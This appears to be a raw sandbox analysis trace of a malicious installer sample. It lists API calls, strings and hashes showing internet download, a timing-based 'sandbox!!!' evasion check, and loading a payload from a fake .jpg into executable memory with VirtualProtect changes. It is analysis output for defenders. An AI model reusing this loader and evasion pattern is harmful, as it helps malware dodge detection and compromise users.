3e59ab 66 API calls 3 library calls 26537->26593 26539 3e5a69 26539->26536 26541 3e5a77 26542 3e5a7b 26541->26542 26543 3e5a83 GetCommandLineA 26541->26543 26594 3eb5af 66 API calls 3 library calls 26542->26594 26578 3ece13 71 API calls 2 library calls 26543->26578 26547 3e5a93 26595 3ecd58 95 API calls 3 library calls 26547->26595 26549 3e5a9d 26550 3e5aa9 26549->26550 26551 3e5aa1 26549->26551 26579 3ecae2 94 API calls 7 library calls 26550->26579 26596 3eb5af 66 API calls 3 library calls 26551->26596 26555 3e5aae 26556 3e5aba 26555->26556 26557 3e5ab2 26555->26557 26580 3eb38e 77 API calls 4 library calls 26556->26580 26597 3eb5af 66 API calls 3 library calls 26557->26597 26561 3e5ac1 26562 3e5acd 26561->26562 26563 3e5ac6 26561->26563 26581 3eca83 94 API calls 2 library calls 26562->26581 26598 3eb5af 66 API calls 3 library calls 26563->26598 26567 3e5ad2 26568 3e5ad8 26567->26568 26582 3e2f22 26567->26582 26568->26567 26571 3e5afc 26600 3eb591 66 API calls _doexit 26571->26600 26574 3e5b01 type_info::_Type_info_dtor 26575->26527 26576->26531 26577->26541 26578->26547 26579->26555 26580->26561 26581->26567 26601 3e1186 26582->26601 26591->26532 26592->26535 26593->26539 26595->26549 26599 3eb565 66 API calls _doexit 26599->26571 26600->26574 26639 3e41ba GetSystemTimeAsFileTime 26601->26639 26603 3e1193 26641 3e434a 26603->26641 26605 3e435c 66 API calls _rand 26606 3e1199 26605->26606 26606->26605 26607 3e11de VirtualAlloc 26606->26607 26608 3e2e3d 26607->26608 26609 3e2e42 __ftelli64_nolock __EH_prolog 26608->26609 26610 3e2e51 InternetOpenA 26609->26610 26611 3e2e6f InternetOpenUrlA 26610->26611 26612 3e2f15 VirtualFree 26610->26612 26613 3e2f0c InternetCloseHandle 26611->26613 26614 3e2e8c 26611->26614 26624 3e168b 26612->26624 26613->26612 26671 3e2d13 26614->26671 26616 3e2ea0 26617 3e2ef4 InternetCloseHandle 26616->26617 26619 3e2ed2 InternetReadFile 26616->26619 26620 3e2ee7 26616->26620 26681 3e25a8 26616->26681 26692 3e2e01 116 API calls std::ios_base::_Ios_base_dtor 26617->26692 26619->26616 26619->26620 26691 3e2c7a 113 API calls Mailbox 26620->26691 26623 3e2ef2 26623->26617 26625 3e1690 26624->26625 26627 3e16ad 26625->26627 26631 3e16da 26625->26631 27107 3e437d 104 API calls 8 library calls 26625->27107 26629 3e16c2 26627->26629 27108 3e437d 104 API calls 8 library calls 26627->27108 26629->26631 27109 3e437d 104 API calls 8 library calls 26629->27109 26632 3e11e1 GetTickCount64 Sleep GetTickCount64 26631->26632 27110 3e4424 26632->27110 26635 3e4424 99 API calls 26636 3e122c VirtualAlloc ReadFile CloseHandle 26635->26636 26638 3e1283 26636->26638 26638->26571 26638->26599 26640 3e41ea __aulldiv 26639->26640 26640->26603 26644 3e979c 26641->26644 26649 3e9723 GetLastError 26644->26649 26646 3e97a4 26647 3e4354 26646->26647 26664 3eb5af 66 API calls 3 library calls 26646->26664 26647->26606 26665 3e95fe TlsGetValue 26649->26665 26652 3e9742 26668 3e63fd 66 API calls __calloc_crt 26652->26668 26653 3e9790 SetLastError 26653->26646 26655 3e974e 26655->26653 26656 3e9756 DecodePointer 26655->26656 26657 3e976b 26656->26657 26658 3e976f 26657->26658 26659 3e9787 26657->26659 26669 3e966f 66 API calls 4 library calls 26658->26669 26670 3e4452 66 API calls 2 library calls 26659->26670 26662 3e9777 GetCurrentThreadId 26662->26653 26663 3e978d 26663->26653 26666 3e962e 26665->26666 26667 3e9613 DecodePointer TlsSetValue 26665->26667 26666->26652 26666->26653 26667->26666 26668->26655 26669->26662 26670->26663 26672 3e2d18 __EH_prolog 26671->26672 26693 3e27f8 26672->26693 26676 3e2d70 26700 3e2468 26676->26700 26679 3e2da9 26679->26616 26682 3e25ad __EH_prolog 26681->26682 26850 3e2202 26682->26850 26685 3e25d6 26858 3e1bed 67 API calls 26685->26858 26687 3e2653 26859 3e24d5 67 API calls __EH_prolog 26687->26859 26689 3e265f 26689->26619 26691->26623 26692->26613 26694 3e27fd __EH_prolog 26693->26694 26713 3e255f 26694->26713 26697 3e1f88 26831 3e1ccd 26697->26831 26699 3e1f93 26699->26676 26702 3e246d __EH_prolog 26700->26702 26701 3e24c0 26701->26679 26708 3e153b 26701->26708 26702->26701 26846 3e130b EnterCriticalSection LeaveCriticalSection std::locale::facet::_Incref 26702->26846 26704 3e24a5 26847 3e2344 114 API calls 7 library calls 26704->26847 26706 3e24af 26707 3e10ee std::ios_base::_Ios_base_dtor 2 API calls 26706->26707 26707->26701 26709 3e15bd 26708->26709 26712 3e1551 26708->26712 26709->26679 26848 3e450c RaiseException 26712->26848 26849 3e3c6b 66 API calls std::exception::_Copy_str 26712->26849 26722 3e1606 26713->26722 26718 3e2596 26720 3e25a2 26718->26720 26737 3e37af EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 26718->26737 26719 3e153b 67 API calls 26719->26718 26720->26697 26723 3e153b 67 API calls 26722->26723 26724 3e1639 26723->26724 26738 3e448c 26724->26738 26727 3e164c 26729 3e22fd 26727->26729 26730 3e2307 __EH_prolog 26729->26730 26780 3e1167 26730->26780 26737->26720 26740 3e4496 26738->26740 26741 3e1640 26740->26741 26745 3e44b2 std::exception::exception 26740->26745 26751 3e729e 26740->26751 26768 3eabfe DecodePointer 26740->26768 26741->26727 26750 3e10d4 82 API calls 3 library calls 26741->26750 26744 3e44fa 26771 3e450c RaiseException 26744->26771 26749 3e44f0 26745->26749 26769 3e65ba 76 API calls __cinit 26745->26769 26748 3e450b 26770 3e3cf0 66 API calls std::exception::operator= 26749->26770 26750->26727 26752 3e731b 26751->26752 26761 3e72ac 26751->26761 26778 3eabfe DecodePointer 26752->26778 26754 3e72b7 26754->26761 26772 3ec900 66 API calls __NMSG_WRITE 26754->26772 26773 3ec751 66 API calls 5 library calls 26754->26773 26774 3eb30d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 26754->26774 26755 3e7321 26779 3ea8eb 66 API calls __getptd_noexit 26755->26779 26758 3e72da RtlAllocateHeap 26759 3e7313 26758->26759 26758->26761 26759->26740 26761->26754 26761->26758 26762 3e7307 26761->26762 26766 3e7305 26761->26766 26775 3eabfe DecodePointer 26761->26775 26776 3ea8eb 66 API calls __getptd_noexit 26762->26776 26777 3ea8eb 66 API calls __getptd_noexit 26766->26777 26768->26740 26769->26749 26770->26744 26771->26748 26772->26754 26773->26754 26775->26761 26776->26766 26777->26759 26778->26755 26779->26759 26805 3e106a 26780->26805 26783 3e1e13 26784 3e1e1d __EH_prolog 26783->26784 26785 3e3131 std::_Lockit::_Lockit EnterCriticalSection 26784->26785 26786 3e1e2c 26785->26786 26820 3e1035 26786->26820 26788 3e1e56 26790 3e3159 _tidy_global LeaveCriticalSection 26788->26790 26789 3e1e43 26789->26788 26826 3e1b6a 114 API calls 3 library calls 26789->26826 26791 3e1eab 26790->26791 26801 3e10ee 26791->26801 26793 3e1e66 26794 3e1e88 26793->26794 26827 3e3cd2 66 API calls std::exception::exception 26793->26827 26796 3e106a std::locale::facet::_Incref 2 API calls 26794->26796 26798 3e1e98 26796->26798 26797 3e1e7a 26828 3e450c RaiseException 26797->26828 26829 3e3185 77 API calls std::_Mutex::_Mutex 26798->26829 26802 3e10f4 26801->26802 26803 3e10f9 26801->26803 26830 3e1092 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 26802->26830 26803->26718 26803->26719 26810 3e3131 26805->26810 26811 3e107b 26810->26811 26812 3e3143 26810->26812 26814 3e3159 26811->26814 26818 3e3b66 EnterCriticalSection 26812->26818 26815 3e108f 26814->26815 26816 3e3160 26814->26816 26815->26783 26819 3e3b76 LeaveCriticalSection 26816->26819 26818->26811 26819->26815 26821 3e1065 26820->26821 26822 3e1041 26820->26822 26821->26789 26823 3e3131 std::_Lockit::_Lockit EnterCriticalSection 26822->26823 26824 3e104b 26823->26824 26825 3e3159 _tidy_global LeaveCriticalSection 26824->26825 26825->26821 26826->26793 26827->26797 26828->26794 26829->26788 26830->26803 26832 3e1cd7 __EH_prolog 26831->26832 26839 3e3a2c 26832->26839 26835 3e448c std::_Mutex::_Mutex 77 API calls 26836 3e1cf7 26835->26836 26838 3e1d03 Mailbox 26836->26838 26844 3e10d4 82 API calls 3 library calls 26836->26844 26838->26699 26840 3e448c std::_Mutex::_Mutex 77 API calls 26839->26840 26841 3e3a38 26840->26841 26845 3e3b46 InitializeCriticalSection 26841->26845 26843 3e1cec 26843->26835 26844->26838 26845->26843 26846->26704 26847->26706 26848->26712 26849->26712 26852 3e2207 __EH_prolog 26850->26852 26851 3e223c 26851->26685 26854 3e1830 26851->26854 26852->26851 26860 3e1f4f 67 API calls 26852->26860 26855 3e18ec 26854->26855 26856 3e1849 _memmove 26854->26856 26855->26685 26856->26855 26861 3e2964 26856->26861 26858->26687 26859->26689 26860->26851 26862 3e2969 Mailbox __EH_prolog 26861->26862 26863 3e29d9 26862->26863 26864 3e29c5 26862->26864 26869 3e2978 Mailbox 26862->26869 26876 3e2512 77 API calls 2 library calls 26863->26876 26873 3e1fca 26864->26873 26867 3e2a94 26868 3e1fca _Fputc 99 API calls 26867->26868 26867->26869 26868->26869 26869->26856 26870 3e29f5 26870->26867 26870->26869 26877 3e566a 99 API calls 4 library calls 26870->26877 26878 3e2408 77 API calls 2 library calls 26870->26878 26879 3e4dc5 26873->26879 26875 3e1fda 26875->26869 26876->26870 26877->26870 26878->26870 26880 3e4dd1 type_info::_Type_info_dtor 26879->26880 26881 3e4dfc 26880->26881 26882 3e4de4 26880->26882 26898 3e50e4 26881->26898 26925 3ea8eb 66 API calls __getptd_noexit 26882->26925 26885 3e4de9 26926 3ea899 11 API calls __mbsnbicmp_l 26885->26926 26887 3e4e77 26890 3e4e85 26887->26890 26904 3eb099 26887->26904 26936 3e4eb9 LeaveCriticalSection LeaveCriticalSection _fputc 26890->26936 26893 3e4df4 type_info::_Type_info_dtor 26893->26875 26894 3e4e12 26894->26887 26934 3ea8eb 66 API calls __getptd_noexit 26894->26934 26896 3e4e6c 26935 3ea899 11 API calls __mbsnbicmp_l 26896->26935 26899 3e5118 EnterCriticalSection 26898->26899 26900 3e50f6 26898->26900 26902 3e4e02 26899->26902 26900->26899 26901 3e50fe 26900->26901 26937 3eb747 26901->26937 26902->26887 26927 3eb073 26902->26927 26905 3eb073 __fseek_nolock 66 API calls 26904->26905 26906 3eb0a9 26905->26906 26907 3eb0cb 26906->26907 26908 3eb0b4 26906->26908 26910 3eb0cf 26907->26910 26918 3eb0dc _vwprintf_helper 26907->26918 27000 3ea8eb 66 API calls __getptd_noexit 26908->27000 27001 3ea8eb 66 API calls __getptd_noexit 26910->27001 26912 3eb13d 26913 3eb1cc 26912->26913 26914 3eb14c 26912->26914 26915 3ebe77 __write 97 API calls 26913->26915 26916 3eb163 26914->26916 26921 3eb180 26914->26921 26920 3eb0b9 26915->26920 26975 3ebe77 26916->26975 26918->26912 26918->26920 26922 3eb132 26918->26922 27002 3f2366 26918->27002 26920->26890 26921->26920 27011 3ec491 71 API calls 6 library calls 26921->27011 26922->26912 26972 3eb1fd 26922->26972 26925->26885 26926->26893 26928 3eb07f 26927->26928 26929 3eb094 26927->26929 27105 3ea8eb 66 API calls __getptd_noexit 26928->27105 26929->26894 26931 3eb084 27106 3ea899 11 API calls __mbsnbicmp_l 26931->27106 26933 3eb08f 26933->26894 26934->26896 26935->26887 26936->26893 26938 3eb76f EnterCriticalSection 26937->26938 26939 3eb75c 26937->26939 26938->26902 26944 3eb685 26939->26944 26941 3eb762 26941->26938 26971 3eb5af 66 API calls 3 library calls 26941->26971 26945 3eb691 type_info::_Type_info_dtor 26944->26945 26946 3eb6b9 26945->26946 26947 3eb6a1 26945->26947 26949 3e63b8 __malloc_crt 65 API calls 26946->26949 26955 3eb6c7 type_info::_Type_info_dtor 26946->26955 26948 3ec900 __FF_MSGBANNER 65 API calls 26947->26948 26950 3eb6a6 26948->26950 26951 3eb6d2 26949->26951 26952 3ec751 __NMSG_WRITE 65 API calls 26950->26952 26953 3eb6e8 26951->26953 26954 3eb6d9 26951->26954 26956 3eb6ad 26952->26956 26958 3eb747 __lock 65 API calls 26953->26958 26957 3ea8eb __mbsnbicmp_l 65 API calls 26954->26957 26955->26941 26959 3eb30d _malloc GetModuleHandleW GetProcAddress ExitProcess 26956->26959 26957->26955 26960 3eb6ef 26958->26960 26961 3eb6b7 26959->26961 26962 3eb6f7 InitializeCriticalSectionAndSpinCount 26960->26962 26963 3eb722 26960->26963 26961->26946 26965 3eb713 26962->26965 26966 3eb707 26962->26966 26964 3e4452 _free 65 API calls 26963->26964 26964->26965 26968 3eb73e __mtinitlocknum LeaveCriticalSection 26965->26968 26967 3e4452 _free 65 API calls 26966->26967 26969 3eb70d 26967->26969 26968->26955 26970 3ea8eb __mbsnbicmp_l 65 API calls 26969->26970 26970->26965 27012 3e63b8 26972->27012 26976 3ebe83 type_info::_Type_info_dtor 26975->26976 26977 3ebe8b 26976->26977 26978 3ebea6 26976->26978 27094 3ea8fe 66 API calls __getptd_noexit 26977->27094 26980 3ebeb2 26978->26980 26983 3ebeec 26978->26983 27096 3ea8fe 66 API calls __getptd_noexit 26980->27096 26981 3ebe90 27095 3ea8eb 66 API calls __getptd_noexit 26981->27095 27018 3f3e85 26983->27018 26985 3ebeb7 27097 3ea8eb 66 API calls __getptd_noexit 26985->27097 26988 3ebef2 26990 3ebf14 26988->26990 26991 3ebf00 26988->26991 26989 3ebebf 27098 3ea899 11 API calls __mbsnbicmp_l 26989->27098 27099 3ea8eb 66 API calls __getptd_noexit 26990->27099 27028 3eb77a 26991->27028 26993 3ebe98 type_info::_Type_info_dtor 26993->26920 26996 3ebf0c 27101 3ebf43 LeaveCriticalSection __unlock_fhandle 26996->27101 26997 3ebf19 27100 3ea8fe 66 API calls __getptd_noexit 26997->27100 27000->26920 27001->26920 27003 3f2373 27002->27003 27004 3f2382 27002->27004 27102 3ea8eb 66 API calls __getptd_noexit 27003->27102 27008 3f23a0 27004->27008 27103 3ea8eb 66 API calls __getptd_noexit 27004->27103 27007 3f2378 27007->26922 27008->26922 27009 3f2393 27104 3ea899 11 API calls __mbsnbicmp_l 27009->27104 27011->26920 27015 3e63c1 27012->27015 27013 3e729e _malloc 65 API calls 27013->27015 27014 3e63f7 27014->26912 27015->27013 27015->27014 27016 3e63d8 Sleep 27015->27016 27017 3e63ed 27016->27017 27017->27014 27017->27015 27019 3f3e91 type_info::_Type_info_dtor 27018->27019 27020 3f3eeb 27019->27020 27021 3eb747 __lock 66 API calls 27019->27021 27022 3f3f0d type_info::_Type_info_dtor 27020->27022 27023 3f3ef0 EnterCriticalSection 27020->27023 27024 3f3ebd 27021->27024 27022->26988 27023->27022 27025 3f3ed9 27024->27025 27026 3f3ec6 InitializeCriticalSectionAndSpinCount 27024->27026 27027 3f3f1b ___lock_fhandle LeaveCriticalSection 27025->27027 27026->27025 27027->27020 27029 3eb789 __ftelli64_nolock 27028->27029 27030 3eb7de 27029->27030 27031 3eb7bf 27029->27031 27064 3eb7b4 27029->27064 27036 3eb83a 27030->27036 27037 3eb81d 27030->27037 27032 3ea8fe __write 66 API calls 27031->27032 27034 3eb7c4 27032->27034 27033 3e65d1 __NMSG_WRITE 5 API calls 27035 3ebe75 27033->27035 27040 3ea8eb __mbsnbicmp_l 66 API calls 27034->27040 27035->26996 27038 3eb850 27036->27038 27039 3eb841 27036->27039 27041 3ea8fe __write 66 API calls 27037->27041 27044 3f2366 __stbuf 66 API calls 27038->27044 27042 3ec40c __lseeki64_nolock 68 API calls 27039->27042 27043 3eb7cb 27040->27043 27045 3eb822 27041->27045 27047 3eb84d 27042->27047 27048 3ea899 __mbsnbicmp_l 11 API calls 27043->27048 27049 3eb856 27044->27049 27046 3ea8eb __mbsnbicmp_l 66 API calls 27045->27046 27050 3eb82a 27046->27050 27047->27038 27048->27064 27051 3ebaf8 27049->27051 27055 3e979c __getptd 66 API calls 27049->27055 27052 3ea899 __mbsnbicmp_l 11 API calls 27050->27052 27053 3ebda8 WriteFile 27051->27053 27054 3ebb07 27051->27054 27052->27064 27056 3ebddb GetLastError 27053->27056 27088 3ebada 27053->27088 27057 3ebbc2 27054->27057 27067 3ebb1a 27054->27067 27058 3eb871 GetConsoleMode 27055->27058 27056->27088 27059 3ebbcf 27057->27059 27060 3ebc9c 27057->27060 27058->27051 27062 3eb89a 27058->27062 27061 3ebe26 27059->27061 27074 3ebc3e WriteFile 27059->27074 27060->27061 27071 3ebd0d WideCharToMultiByte 27060->27071 27061->27064 27065 3ea8eb __mbsnbicmp_l 66 API calls 27061->27065 27062->27051 27063 3eb8aa GetConsoleCP 27062->27063 27063->27088 27092 3eb8cd 27063->27092 27064->27033 27069 3ebe49 27065->27069 27066 3ebdf9 27072 3ebe18 27066->27072 27073 3ebe04 27066->27073 27067->27061 27068 3ebb64 WriteFile 27067->27068 27068->27056 27070 3ebb98 27068->27070 27075 3ea8fe __write 66 API calls 27069->27075 27070->27067 27080 3ebbbd 27070->27080 27070->27088 27071->27056 27077 3ebd44 WriteFile 27071->27077 27078 3ea911 __dosmaperr 66 API calls 27072->27078 27076 3ea8eb __mbsnbicmp_l 66 API calls 27073->27076 27074->27056 27079 3ebc72 27074->27079 27075->27064 27081 3ebe09 27076->27081 27082 3ebd7b GetLastError 27077->27082 27086 3ebd6f 27077->27086 27078->27064 27079->27059 27079->27080 27079->27088 27080->27088 27084 3ea8fe __write 66 API calls 27081->27084 27082->27086 27083 3f2566 __write_nolock 76 API calls 27083->27092 27084->27064 27085 3f3cfb 78 API calls __fassign 27085->27092 27086->27060 27086->27077 27086->27080 27086->27088 27087 3eb979 WideCharToMultiByte 27087->27088 27089 3eb9aa WriteFile 27087->27089 27088->27061 27088->27064 27088->27066 27089->27056 27090 3eb9d1 27089->27090 27090->27056 27090->27088 27091 3f3ba3 WriteConsoleW CreateFileW __write_nolock 27090->27091 27090->27092 27093 3eb9fe WriteFile 27090->27093 27091->27090 27092->27083 27092->27085 27092->27087 27092->27088 27092->27090 27093->27056 27093->27090 27094->26981 27095->26993 27096->26985 27097->26989 27098->26993 27099->26997 27100->26996 27101->26993 27102->27007 27103->27009 27104->27007 27105->26931 27106->26933 27107->26625 27108->26627 27109->26629 27113 3eabb4 27110->27113 27116 3eab2f 27113->27116 27115 3e1216 27115->26635 27115->26636 27117 3eab3b _vwprintf_helper type_info::_Type_info_dtor 27116->27117 27118 3eab67 27117->27118 27119 3eab52 27117->27119 27121 3e50e4 __lock_file 67 API calls 27118->27121 27131 3ea8eb 66 API calls __getptd_noexit 27119->27131 27123 3eab6d 27121->27123 27122 3eab57 27132 3ea899 11 API calls __mbsnbicmp_l 27122->27132 27133 3e9a60 66 API calls 4 library calls 27123->27133 27126 3eab78 27134 3e9afc 97 API calls __flush 27126->27134 27127 3eab62 type_info::_Type_info_dtor 27127->27115 27129 3eab91 27135 3eabac LeaveCriticalSection LeaveCriticalSection _fputc 27129->27135 27131->27122 27132->27127 27133->27126 27134->27129 27135->27127 27136 2f9fb37 27153 2fa1628 GetPEB 27136->27153 27138 2f9fb57 27139 2fa1628 GetPEB 27138->27139 27140 2f9fb6b 27139->27140 27141 2f9fb84 VirtualAlloc 27140->27141 27152 2f9fcc8 27140->27152 27142 2f9fb9b 27141->27142 27141->27152 27143 2fa1628 GetPEB 27142->27143 27142->27152 27144 2f9fc0d 27143->27144 27145 2f9fc2b LoadLibraryA 27144->27145 27148 2f9fc3b 27144->27148 27144->27152 27145->27145 27145->27148 27146 2fa1628 GetPEB 27146->27148 27147 2f9fc77 27147->27152 27155 2f9ffe7 LoadLibraryA 27147->27155 27148->27146 27148->27147 27148->27152 27154 2fa163c 27153->27154 27154->27138 27156 2fa0004 27155->27156 27157 2f9fcb5 27155->27157 27156->27157 27158 2fa002c VirtualProtect 27156->27158 27157->27152 27165 2fa00cd 27157->27165 27158->27157 27159 2fa0040 27158->27159 27160 2fa005a VirtualProtect 27159->27160 27161 2fa0076 27160->27161 27161->27157 27162 2fa008a VirtualProtect 27161->27162 27162->27157 27163 2fa009a 27162->27163 27164 2fa00af VirtualProtect 27163->27164 27164->27157 27167 2fa00de 27165->27167 27166 2fa00e4 27166->27152 27167->27166 27168 2fa0112 VirtualProtect 27167->27168 27168->27166 27169 2fa0126 27168->27169 27170 2fa0140 VirtualProtect 27169->27170 27171 2fa015c 27170->27171 27171->27166 27172 2fa0170 VirtualProtect 27171->27172 27172->27166 27173 2fa0180 27172->27173 27174 2fa0195 VirtualProtect 27173->27174 27174->27166 27175 3e2c31 27176 3e2c3f 27175->27176 27178 3e2c52 Mailbox 27175->27178 27181 3e285a 27176->27181 27179 3e2c44 27188 3e5902 27179->27188 27182 3e2864 __EH_prolog 27181->27182 27184 3e288b Mailbox 27182->27184 27201 3e2512 77 API calls 2 library calls 27182->27201 27184->27179 27185 3e28aa 27185->27184 27202 3e566a 99 API calls 4 library calls 27185->27202 27203 3e2408 77 API calls 2 library calls 27185->27203 27189 3e590e type_info::_Type_info_dtor 27188->27189 27190 3e5935 27189->27190 27191 3e5920 27189->27191 27193 3e50e4 __lock_file 67 API calls 27190->27193 27195 3e5930 type_info::_Type_info_dtor 27190->27195 27220 3ea8eb 66 API calls __getptd_noexit 27191->27220 27196 3e594e 27193->27196 27194 3e5925 27221 3ea899 11 API calls __mbsnbicmp_l 27194->27221 27195->27178 27204 3e5895 27196->27204 27201->27185 27202->27185 27203->27185 27205 3e58ba 27204->27205 27206 3e58a6 27204->27206 27218 3e58b6 27205->27218 27223 3e51c2 27205->27223 27229 3ea8eb 66 API calls __getptd_noexit 27206->27229 27209 3e58ab 27230 3ea899 11 API calls __mbsnbicmp_l 27209->27230 27213 3e58ce 27214 3eb073 __fseek_nolock 66 API calls 27213->27214 27215 3e58d4 27214->27215 27232 3ec617 72 API calls 6 library calls 27215->27232 27217 3e58da 27217->27218 27233 3e4452 66 API calls 2 library calls 27217->27233 27222 3e596e LeaveCriticalSection LeaveCriticalSection _fputc 27218->27222 27220->27194 27221->27195 27222->27195 27224 3e51db 27223->27224 27225 3e51fd 27223->27225 27224->27225 27226 3eb073 __fseek_nolock 66 API calls 27224->27226 27231 3ec024 66 API calls _free 27225->27231 27227 3e51f6 27226->27227 27228 3ebe77 __write 97 API calls 27227->27228 27228->27225 27229->27209 27230->27218 27231->27213 27232->27217 27233->27218
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E25AD
                      • Part of subcall function 003E2202: __EH_prolog.LIBCMT ref: 003E2207
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
                    • Instruction ID: 1d236603f44a09471aad1f111d3d4ef84b595de0dd78e2a1466ac36ccc99eb1a
                    • Opcode Fuzzy Hash: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
                    • Instruction Fuzzy Hash: 75113D75900269DFCF12DF99C981AAEBBB8FF18314F20825AE552672A1C7759F00DF90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID: \VJm
                    • API String ID: 0-4047210350
                    • Opcode ID: 100c60d5016897ccb8402a998b061fa5926b077ed08ae4675096790860f8ba7d
                    • Instruction ID: 066c6941ed05a609f212038dc9b4792b01fa69b77436b2682e086d52d350a870
                    • Opcode Fuzzy Hash: 100c60d5016897ccb8402a998b061fa5926b077ed08ae4675096790860f8ba7d
                    • Instruction Fuzzy Hash: 36B13E70E042098FDF14CFA9C985BEEBBF2BF88714F14812AD415A7394EB759845CB82
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af531306ec52a83faad8fe8e491c3ae5bbcd54fc439aec5e37e9ecae3efe2ca3
                    • Instruction ID: 74b215cd7a4aa4c981ce181af88dee26fbe45b11ce322fcba493ba19c9675d4a
                    • Opcode Fuzzy Hash: af531306ec52a83faad8fe8e491c3ae5bbcd54fc439aec5e37e9ecae3efe2ca3
                    • Instruction Fuzzy Hash: C25283347003019BDB08EBB6D964FAE77A7FF84700F50415AD4469B399EF359C468B82
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 522102227a06c9bb29b1563522a73a0297f0a2e1430daf848a48f58e198d2ad0
                    • Instruction ID: c11285f4072cb92a4e79b40425da3f0a97896582cb722657e163ec676c0eed83
                    • Opcode Fuzzy Hash: 522102227a06c9bb29b1563522a73a0297f0a2e1430daf848a48f58e198d2ad0
                    • Instruction Fuzzy Hash: 81722970A00619DFDB14DFA9C984BAEBBB6FF88340F1481AAE506EB351DB34D941CB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aadb66daa41557852879fb17055975b48864d628e6d6a9a17d9968dec593a71a
                    • Instruction ID: 84692772135cd4316bacd4ac2b321d5b2bfc5291f96957e19eff3e428a4dd0ac
                    • Opcode Fuzzy Hash: aadb66daa41557852879fb17055975b48864d628e6d6a9a17d9968dec593a71a
                    • Instruction Fuzzy Hash: 25820631A046099FCB14CF69D984BEABBF2FF88314F15859AE406DB365DB30E941CB52
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4ceb48b05b62bdd1a8e70ae1c2352ccb2a93024944e942e1997fa2b4383ff46
                    • Instruction ID: 41bf1414eb1e87762c2108b4aff08e639bbe028525a6eac2fc30b79f56554548
                    • Opcode Fuzzy Hash: b4ceb48b05b62bdd1a8e70ae1c2352ccb2a93024944e942e1997fa2b4383ff46
                    • Instruction Fuzzy Hash: 4AB13C70E04209CFDB14CFA9C8857EEBBF2BF88714F54852AD815A7394EB749845CB82

                    Control-flow Graph

                    APIs
                    • GetTickCount64.KERNEL32 ref: 003E11EF
                    • Sleep.KERNEL32(0000012C), ref: 003E11F9
                    • GetTickCount64.KERNEL32 ref: 003E11FF
                      • Part of subcall function 003E4424: __vwprintf_l.LIBCMT ref: 003E4432
                    • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003E1244
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003E124E
                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003E125F
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1270
                    • CloseHandle.KERNEL32(00000000), ref: 003E1277
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
                    • String ID: C:\Users\Public\Downloads\ind.jpg$`3Wu01Wu$sandbox!!!$v4:%d
                    • API String ID: 1694741105-1659962086
                    • Opcode ID: 9129fa001ae7cb9a9e449da07c5b4552e20c13dcffa7c27bd578de3a5fde6620
                    • Instruction ID: 8450c90eaefe9014b339f9e22102e425d695abe902eaa199d06a025ce3dea5cb
